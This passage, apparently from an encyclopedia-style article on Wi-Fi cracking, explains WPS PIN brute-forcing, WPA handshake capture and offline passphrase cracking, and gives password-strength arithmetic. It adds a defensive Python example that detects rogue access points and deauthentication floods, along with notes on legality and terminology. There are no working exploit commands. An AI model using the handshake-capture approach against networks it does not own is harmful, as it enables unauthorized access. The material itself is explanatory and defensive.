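The worst case is 11,000 attempts, and the mock above needs 1803 for this PIN; a real exchange takes a second or more per attempt, which is where the figure of a few hours comes from. With a lock-out after ten failures the search never leaves phase 1.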

SSIDs are used not only to identify networks among the many sharing the 2.4, 3.6, 5 and 60 GHz bands in a city, but also as the salt when the passphrase is turned into the pairwise master key (PBKDF2-HMAC-SHA1 with 4096 iterations). Precomputed (rainbow) tables therefore work only for popular default SSIDs such as "Netgear" or "linksys"; any custom SSID forces the attacker back to computing the full derivation for every candidate.

The most popular method of WPA and WPA2 cracking is obtaining what is known as the four-way handshake. When a device connects to a network it goes through a four-message EAPOL-Key exchange in which both sides prove that they hold the same key without sending it. The exchange goes over the air and can easily be recorded by any monitor-mode card in range. The handshake is not encrypted; it carries two nonces and a message integrity code computed with a key derived from the passphrase, and that code is what a cracker tests candidate passphrases against offline, far faster than attempting logins against the router. A device connected to the router by cable does not perform this 802.11 handshake at all, so there is nothing to intercept on the wire.

Having captured a handshake does not mean the cracker is granted immediate access. If the password contains at least 12 characters of random upper and lower case letters and digits that do not spell a word, name or pattern, it is out of reach of dictionary and brute-force attacks. As an illustration, take the WPA2 minimum of 8 characters drawn from an alphabet of 64 (upper and lower case letters, the digits 0-9 and a small selection of symbols): that is 64^8, about 2.8 x 10^14, possible combinations.
At 500 guesses per second on a single machine, trying every combination would take about 17,900 years, not to mention the space needed to store them all in a dictionary. That rate is a CPU figure from the time of writing, however; a modern GPU computes the PBKDF2 step on the order of a million times per second, which brings 8 random characters down to years rather than millennia and makes length, not just character mix, the decisive factor.

Note: MAC filtering alone will not protect a network, since the MAC addresses in use are visible in every frame and can be spoofed easily.

Detection
A network scanner or sniffer is an application program that drives a wireless network interface card in monitor mode. It tunes the card to each of the radio channels in turn (channel hopping). With a passive scanner this involves only the receiver of the wireless card, and therefore the scanning cannot be detected over the air.

An attacker can obtain a considerable amount of information with a passive scanner, but more may be obtained by sending crafted frames that provoke useful responses, for example probe requests that make access points answer with probe responses. This is called active scanning or probing. Active scanning uses the transmitter of the wireless card; the activity can therefore be detected and the wireless card can be located.

Detection is possible with an intrusion detection system for wireless networks, and locating is possible with suitable direction-finding equipment.

Wireless intrusion detection systems (WIDS) are designed to detect anomalous behaviour. They have one or more sensors that collect SSIDs, radio channels, beacon intervals, encryption settings, MAC addresses and transmission speeds. They maintain a registry of authorized access points and client MAC addresses, against which unknown clients and rogue access points (an unknown BSSID advertising a known SSID) are detected, and they flag floods of deauthentication frames, the signature of the handshake- and ARP-capture attacks described above.
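A minimal version of the registry-and-rules logic described above. This is an added example, not code from the page or from any WIDS product; the authorized-AP and client registries and the frame log are constructed. It flags a rogue access point (an unknown BSSID advertising a known SSID), a burst of deauthentication frames within a sliding time window, and an authentication attempt from a client that is not in the registry, and it stays silent on the normal join and on deauthentications spread out over time.

```python
"""Rule-based wireless intrusion detection over a constructed frame log.
Added example for this page, not code from any WIDS product."""
from collections import defaultdict, deque

# Registries a WIDS maintains (constructed values).
AUTHORIZED_APS = {"corpnet": {"00:11:22:33:44:55", "00:11:22:33:44:56"}}
KNOWN_CLIENTS = {"66:77:88:99:aa:bb", "66:77:88:99:aa:cc"}

def detect(events, deauth_threshold=5, window=10.0):
    """events: iterable of (time, subtype, source MAC, BSSID, SSID-or-None), as a
    monitor-mode sensor would log them. Returns de-duplicated alert tuples."""
    alerts, seen = [], set()
    deauth_times = defaultdict(deque)

    def raise_alert(*key):
        if key not in seen:
            seen.add(key)
            alerts.append(key)

    for t, subtype, src, bssid, ssid in events:
        # Rule 1: a known SSID advertised by a BSSID that is not in the AP registry (evil twin)
        if subtype in ("beacon", "probe-resp") and ssid in AUTHORIZED_APS \
                and bssid not in AUTHORIZED_APS[ssid]:
            raise_alert("rogue-ap", ssid, bssid)
        # Rule 2: deauthentication flood, judged per BSSID over a sliding time window
        if subtype == "deauth":
            q = deauth_times[bssid]
            q.append(t)
            while q and t - q[0] > window:
                q.popleft()
            if len(q) >= deauth_threshold:
                raise_alert("deauth-flood", bssid)
        # Rule 3: a client outside the registry trying to join
        if subtype in ("auth", "assoc-req") and src not in KNOWN_CLIENTS:
            raise_alert("unknown-client", src)
    return alerts

# Constructed sensor log: a normal join, an evil twin, an unknown client, a spoofed deauth burst
EVENTS = [
    (0.0, "beacon", "00:11:22:33:44:55", "00:11:22:33:44:55", "corpnet"),
    (0.2, "auth", "66:77:88:99:aa:bb", "00:11:22:33:44:55", None),
    (0.3, "assoc-req", "66:77:88:99:aa:bb", "00:11:22:33:44:55", "corpnet"),
    (1.0, "beacon", "de:ad:be:ef:00:01", "de:ad:be:ef:00:01", "corpnet"),
    (5.0, "auth", "02:00:00:00:00:01", "00:11:22:33:44:55", None),
] + [(20.0 + i * 0.1, "deauth", "00:11:22:33:44:55", "00:11:22:33:44:55", None)
     for i in range(8)]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

The deauthentication rule is the one that catches the attacks in this article: a legitimate network sends a deauthentication now and then, an attacker forcing reconnections sends dozens within seconds, and a per-BSSID sliding window separates the two without needing to know who is spoofing whom.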

Legality
The Netherlands
Making use of someone else's wireless access point or wireless router to connect to the internet, without the owner's consent in any way, is not punishable by criminal law in the Netherlands. This is true even if the device uses some form of access protection. Penetrating someone else's computer without the owner's consent is punishable by criminal law, though.

See also
 * (parasitic use of wireless networks to obtain internet access)

Crackers and society
Computer attackers are commonly divided into the following groups.
 * Adolescent amateurs. They often have a basic knowledge of computer systems and apply scripts and techniques that are available on the internet.
 * Adult amateurs. Most of them are motivated by the intellectual challenge.
 * Professionals. They know a great deal about computers. They are motivated by financial reward, but they are also fond of their activity.

Naming of crackers
The term hacker was originally used for someone who could modify a computer for his or her own purposes. Hacking is an intrusion combined with direct alteration of the security or data structures of the breached system. The word hacking is often confused with cracking in popular media discourse, which obscures the fact that hacking is less about eavesdropping and more about interference and alteration. However, because of the consistent misuse by the news media, by 2007 the term hacker was commonly used for someone who accesses a network or a computer without the authorization of the owner.

In 2011, a dictionary entry stated that the word hacker can mean a computer fanatic, in particular one who breaks into the computer system of a company, government, or the like. It also noted that in that sense the word hacker is slang. Slang words are not appropriate in formal writing or speech.

Computer experts reserve the word hacker for a very clever programmer. They call someone who breaks into computers an intruder, attacker, or cracker.

See also

 * rogue Wi-Fi access point (evil twin)
 * http://www.wigle.net/ — WiGLE, a public database of wardriving results